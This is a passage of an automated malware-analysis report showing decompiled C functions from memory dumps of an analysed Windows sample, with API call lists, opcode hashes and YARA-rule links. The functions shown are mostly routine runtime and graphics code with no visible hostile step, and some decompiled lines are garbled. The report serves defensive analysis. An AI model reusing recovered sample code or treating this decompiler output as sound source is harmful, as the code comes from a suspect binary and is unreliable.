				intOrPtr _v324;
				intOrPtr _v340;
				void _v344;
				int _t15;
				int _t16;
				int* _t18;
				int* _t19;
				int _t21;
				int* _t28;
				int* _t29;
				int* _t30;

				_v344 = 0x158;
				if(SystemParametersInfoA(0x29, 0x158,  &_v344, 0) == 0) {
					_t15 = GetSystemMetrics(0x5c);
					_t28 = _a12;
					_t21 = _t15;
					if(_t28 != 0) {
						_t15 = GetSystemMetrics(0xf);
						 *_t28 = _t15;
					}
					_t29 = _a4;
					if(_t29 != 0) {
						_t15 = GetSystemMetrics(7) + _t21;
						 *_t29 = _t15;
					}
					_t30 = _a8;
					if(_t30 != 0) {
						_t16 = GetSystemMetrics(4);
						 *_t30 = _t16;
						return _t16;
					}
					goto L13;
				} else {
					_t18 = _a12;
					if(_t18 != 0) {
						 *_t18 = _v188;
					}
					_t19 = _a4;
					if(_t19 != 0) {
						 *_t19 = _v340 + _v4;
					}
					_t15 = _a8;
					if(_t15 == 0) {
						L13:
						return _t15;
					} else {
						 *_t15 = _v324;
						return _t15;
					}
				}
			}
















                                                                                                                                                      0x00403296
                                                                                                                                                      0x004032a6
                                                                                                                                                      0x004032f9
                                                                                                                                                      0x004032fb
                                                                                                                                                      0x00403302
                                                                                                                                                      0x00403306
                                                                                                                                                      0x0040330a
                                                                                                                                                      0x0040330c
                                                                                                                                                      0x0040330c
                                                                                                                                                      0x0040330e
                                                                                                                                                      0x00403317
                                                                                                                                                      0x0040331d
                                                                                                                                                      0x0040331f
                                                                                                                                                      0x0040331f
                                                                                                                                                      0x00403321
                                                                                                                                                      0x0040332b
                                                                                                                                                      0x0040332f
                                                                                                                                                      0x00403331
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403331
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004032a8
                                                                                                                                                      0x004032a8
                                                                                                                                                      0x004032b1
                                                                                                                                                      0x004032ba
                                                                                                                                                      0x004032ba
                                                                                                                                                      0x004032bc
                                                                                                                                                      0x004032c5
                                                                                                                                                      0x004032d4
                                                                                                                                                      0x004032d4
                                                                                                                                                      0x004032d6
                                                                                                                                                      0x004032df
                                                                                                                                                      0x0040333b
                                                                                                                                                      0x0040333b
                                                                                                                                                      0x004032e1
                                                                                                                                                      0x004032e6
                                                                                                                                                      0x004032ef
                                                                                                                                                      0x004032ef
                                                                                                                                                      0x004032df

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: System$Metrics$InfoParameters
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3136151823-0
                                                                                                                                                      • Opcode ID: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
                                                                                                                                                      • Instruction ID: 4f0a499fe05242b0b8db50700348c8926cdac99036846cfd25217758564b63bb
                                                                                                                                                      • Opcode Fuzzy Hash: 399c20f0005a25461aa70f262010debf80290863208646817f723a6a16c89255
                                                                                                                                                      • Instruction Fuzzy Hash: CF114C35308741DFE3209F59DC80BEBBBE8AFC4751F14442AA988AB380DB7598048B96
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019330, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAC0(_a4);
				_t18 = E1000CAC0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAC0(_a8);
						_t21 = E1000CAC0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}















                                                                                                                                                      0x10019330
                                                                                                                                                      0x10019330
                                                                                                                                                      0x1001933b
                                                                                                                                                      0x10019349
                                                                                                                                                      0x1001934e
                                                                                                                                                      0x10019353
                                                                                                                                                      0x1001935e
                                                                                                                                                      0x10019361
                                                                                                                                                      0x1001937c
                                                                                                                                                      0x10019380
                                                                                                                                                      0x10019391
                                                                                                                                                      0x10019396
                                                                                                                                                      0x1001939b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193b2
                                                                                                                                                      0x100193b7
                                                                                                                                                      0x100193bc
                                                                                                                                                      0x10019370
                                                                                                                                                      0x10019379
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019379
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193be
                                                                                                                                                      0x00000000
                                                                                                                                                      0x100193c7
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
                                                                                                                                                      • Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
                                                                                                                                                      • Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100196D0, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAC0(_a4);
					_t21 = E1000CAC0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAC0(_a4);
							_t24 = E1000CAC0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}















                                                                                                                                                      0x100196d0
                                                                                                                                                      0x100196d0
                                                                                                                                                      0x100196d7
                                                                                                                                                      0x100196e2
                                                                                                                                                      0x100196f6
                                                                                                                                                      0x10019704
                                                                                                                                                      0x10019709
                                                                                                                                                      0x1001970e
                                                                                                                                                      0x10019710
                                                                                                                                                      0x10019722
                                                                                                                                                      0x10019726
                                                                                                                                                      0x10019734
                                                                                                                                                      0x10019739
                                                                                                                                                      0x10019741
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001975b
                                                                                                                                                      0x10019760
                                                                                                                                                      0x10019765
                                                                                                                                                      0x1001971f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019767
                                                                                                                                                      0x10019767
                                                                                                                                                      0x10019767
                                                                                                                                                      0x00000000
                                                                                                                                                      0x10019765
                                                                                                                                                      0x10019722
                                                                                                                                                      0x1001970e
                                                                                                                                                      0x10019772
                                                                                                                                                      0x10019779

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
                                                                                                                                                      • Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
                                                                                                                                                      • Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401250, Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401250(intOrPtr _a4) {
				void* _t15;
				void* _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t29;

				_t29 = _a4;
				_t14 =  *((intOrPtr*)(_t29 + 0x2c));
				if( *((intOrPtr*)(_t29 + 0x2c)) != 0) {
					E00403650(_t14);
					 *((intOrPtr*)(_t29 + 0x2c)) = 0;
				}
				_t15 =  *(_t29 + 0xc);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 =  *(_t29 + 0x18);
				 *(_t29 + 0xc) = 0;
				if(_t16 != 0) {
					DeleteObject(_t16);
				}
				_t17 =  *(_t29 + 0x1c);
				 *(_t29 + 0x18) = 0;
				if(_t17 != 0) {
					DeleteObject(_t17);
				}
				_t18 =  *(_t29 + 0x20);
				 *(_t29 + 0x1c) = 0;
				if(_t18 != 0) {
					DeleteObject(_t18);
				}
				_t19 =  *(_t29 + 0x24);
				 *(_t29 + 0x20) = 0;
				if(_t19 != 0) {
					DeleteObject(_t19);
				}
				 *(_t29 + 0x24) = 0;
				return 0;
			}









                                                                                                                                                      0x00401252
                                                                                                                                                      0x00401259
                                                                                                                                                      0x0040125e
                                                                                                                                                      0x00401261
                                                                                                                                                      0x00401269
                                                                                                                                                      0x00401269
                                                                                                                                                      0x0040126c
                                                                                                                                                      0x00401277
                                                                                                                                                      0x0040127a
                                                                                                                                                      0x0040127a
                                                                                                                                                      0x0040127c
                                                                                                                                                      0x0040127f
                                                                                                                                                      0x00401284
                                                                                                                                                      0x00401287
                                                                                                                                                      0x00401287
                                                                                                                                                      0x00401289
                                                                                                                                                      0x0040128c
                                                                                                                                                      0x00401291
                                                                                                                                                      0x00401294
                                                                                                                                                      0x00401294
                                                                                                                                                      0x00401296
                                                                                                                                                      0x00401299
                                                                                                                                                      0x0040129e
                                                                                                                                                      0x004012a1
                                                                                                                                                      0x004012a1
                                                                                                                                                      0x004012a3
                                                                                                                                                      0x004012a6
                                                                                                                                                      0x004012ab
                                                                                                                                                      0x004012ae
                                                                                                                                                      0x004012ae
                                                                                                                                                      0x004012b0
                                                                                                                                                      0x004012b8

                                                                                                                                                      APIs
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040127A
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401287
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401294
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004012A1
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004012AE
                                                                                                                                                        • Part of subcall function 00403650: CloseHandle.KERNEL32(?,00401266,?), ref: 00403659
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DeleteObject$CloseHandle
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4038695863-0
                                                                                                                                                      • Opcode ID: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
                                                                                                                                                      • Instruction ID: 8bf31a696b1b558d097ec00c0e5610933454923f565c7d704a328e82ec1086a0
                                                                                                                                                      • Opcode Fuzzy Hash: b5e570a17f1e940c12e593b2320b66470befd8047a5ea254375dc817615700be
                                                                                                                                                      • Instruction Fuzzy Hash: 6801ACB5A00B009FC631DF6ADC84817F7E9BB887503644E6EE489E3751D639E8458B68
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00401330, Relevance: 7.5, APIs: 5, Instructions: 40windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00401330(void* _a4, int _a8, int _a12, int _a16, int _a20) {
				int _v0;
				void* _t11;
				struct HDC__* _t22;
				struct HDC__* _t23;

				_t22 = _a4;
				_t23 = CreateCompatibleDC(_t22);
				_t11 = SelectObject(_t23, _a4);
				BitBlt(_t22, _v0, _a4, _a16, _a20, _t23, _a8, _a12, 0xcc0020);
				SelectObject(_t23, _t11);
				return DeleteDC(_t23);
			}







                                                                                                                                                      0x00401334
                                                                                                                                                      0x00401345
                                                                                                                                                      0x0040134d
                                                                                                                                                      0x00401376
                                                                                                                                                      0x0040137e
                                                                                                                                                      0x0040138b

                                                                                                                                                      APIs
                                                                                                                                                      • CreateCompatibleDC.GDI32(?), ref: 00401339
                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0040134D
                                                                                                                                                      • BitBlt.GDI32(?,?,?,?,?,00000000,?,?,00CC0020), ref: 00401376
                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0040137E
                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00401381
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ObjectSelect$CompatibleCreateDelete
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 488333989-0
                                                                                                                                                      • Opcode ID: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
                                                                                                                                                      • Instruction ID: 951521e5306c9743b1bbe3f12aef3e554a535aac35f3b270d8b20651ae45f907
                                                                                                                                                      • Opcode Fuzzy Hash: fdb27461bc161449168f726a47084b6a473ccc3699775058bb529457060b94c2
                                                                                                                                                      • Instruction Fuzzy Hash: 31F0A972205214BF9240EB59DD84D7FB7ECEFCDAA5B004519F648D3210C731AD058BBA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EA65, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1000EA65(void* __ebx, void* __edi) {

				E100130A0();
				if(E100148B1(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10332c68);
					__eax = E10013034( *0x10333820);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E10013107(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}



                                                                                                                                                      0x1000ea65
                                                                                                                                                      0x1000ea7c
                                                                                                                                                      0x1000ea82
                                                                                                                                                      0x1000ea83
                                                                                                                                                      0x1000ea8f
                                                                                                                                                      0x1000ea97
                                                                                                                                                      0x1000ea99
                                                                                                                                                      0x1000eab2
                                                                                                                                                      0x1000eab3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1000ea9b
                                                                                                                                                      0x1000ea9b
                                                                                                                                                      0x1000ea9c
                                                                                                                                                      0x1000ea9d
                                                                                                                                                      0x1000eaa4
                                                                                                                                                      0x1000eaaa
                                                                                                                                                      0x1000eaae
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000eacc
                                                                                                                                                      0x1000ea99
                                                                                                                                                      0x1000ead1

                                                                                                                                                      APIs
                                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 1000EA65
                                                                                                                                                        • Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
                                                                                                                                                        • Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
                                                                                                                                                        • Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3
                                                                                                                                                      • __calloc_crt.LIBCMT ref: 1000EA71
                                                                                                                                                        • Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
                                                                                                                                                        • Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6
                                                                                                                                                      • __decode_pointer.LIBCMT ref: 1000EA8F
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
                                                                                                                                                        • Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058
                                                                                                                                                      • __initptd.LIBCMT ref: 1000EA9D
                                                                                                                                                        • Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
                                                                                                                                                        • Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
                                                                                                                                                        • Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
                                                                                                                                                        • Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1000EAA4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1662683381-0
                                                                                                                                                      • Opcode ID: d30fb72e8bc76df9a33aede914a2a08a3dca29834d0d6b313e301109ddb285b0
                                                                                                                                                      • Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
                                                                                                                                                      • Opcode Fuzzy Hash: d30fb72e8bc76df9a33aede914a2a08a3dca29834d0d6b313e301109ddb285b0
                                                                                                                                                      • Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00406BC0, Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E00406BC0(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				void _t10;
				void* _t12;
				void* _t17;
				long _t18;
				void* _t19;

				_t17 = __edx;
				_t12 = __ecx;
				_t18 = GetLastError();
				_t19 = TlsGetValue( *0x40f9fc);
				if(_t19 == 0) {
					_t19 = E00408C2B(_t12, 1, 0x74);
					if(_t19 == 0 || TlsSetValue( *0x40f9fc, _t19) == 0) {
						_push(0x10);
						E00403CCB(_t17, _t19);
					} else {
						E00406BAD(_t19);
						_t10 = GetCurrentThreadId();
						 *(_t19 + 4) =  *(_t19 + 4) | 0xffffffff;
						 *_t19 = _t10;
					}
				}
				SetLastError(_t18);
				return _t19;
			}









                                                                                                                                                      0x00406bc0
                                                                                                                                                      0x00406bc0
                                                                                                                                                      0x00406bce
                                                                                                                                                      0x00406bd6
                                                                                                                                                      0x00406bda
                                                                                                                                                      0x00406be5
                                                                                                                                                      0x00406beb
                                                                                                                                                      0x00406c13
                                                                                                                                                      0x00406c15
                                                                                                                                                      0x00406bfe
                                                                                                                                                      0x00406bff
                                                                                                                                                      0x00406c05
                                                                                                                                                      0x00406c0b
                                                                                                                                                      0x00406c0f
                                                                                                                                                      0x00406c0f
                                                                                                                                                      0x00406beb
                                                                                                                                                      0x00406c1c
                                                                                                                                                      0x00406c26

                                                                                                                                                      APIs
                                                                                                                                                      • GetLastError.KERNEL32(?,?,004063A0), ref: 00406BC2
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,004063A0), ref: 00406BD0
                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,004063A0), ref: 00406C1C
                                                                                                                                                        • Part of subcall function 00408C2B: HeapAlloc.KERNEL32(00000008,?,00000000,00000000), ref: 00408D21
                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,004063A0), ref: 00406BF4
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00406C05
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2020098873-0
                                                                                                                                                      • Opcode ID: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
                                                                                                                                                      • Instruction ID: 2403d90e008a7af22ec6c7de5fb275aeee1f8d1f1e2512a8fb4e243af935bce0
                                                                                                                                                      • Opcode Fuzzy Hash: 851aaa287e66f3f2a569adf214d11eaa7bce3c3a8ed0d30959d25bc31ff2cb26
                                                                                                                                                      • Instruction Fuzzy Hash: D4F0F6325056119BE7312B30BE0975B3A64EF41771711053AFAD2FA2D1DB388C418ADC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004043EA, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 170COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __aulldiv__aullrem
                                                                                                                                                      • String ID: $9
                                                                                                                                                      • API String ID: 3839614884-1776416348
                                                                                                                                                      • Opcode ID: d6dacab73d4cfa54ea8b20ef37b8a06407e77a214102cd57d9a2bb1cbe5c3d40
                                                                                                                                                      • Instruction ID: e0dcd54c5c3e887c7f10d5284822680c003a79e82bb73371b6c8bcf29293307e
                                                                                                                                                      • Opcode Fuzzy Hash: d6dacab73d4cfa54ea8b20ef37b8a06407e77a214102cd57d9a2bb1cbe5c3d40
                                                                                                                                                      • Instruction Fuzzy Hash: 5C516CB2D00219AFDF11DFD8CC45BEEBBB8EF44354F144066EA10B6292D3399A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004046E3, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E004046E3() {
				signed int _v12;
				signed long long _v20;
				signed long long _v28;
				void* _t10;
				struct HINSTANCE__* _t19;

				_t19 = GetModuleHandleA("KERNEL32");
				if(_t19 == 0) {
					L6:
					_v12 =  *0x40b2d8;
					_v20 =  *0x40b2d0;
					asm("fsubr qword [ebp-0x10]");
					_v28 = _v20 / _v12 * _v12;
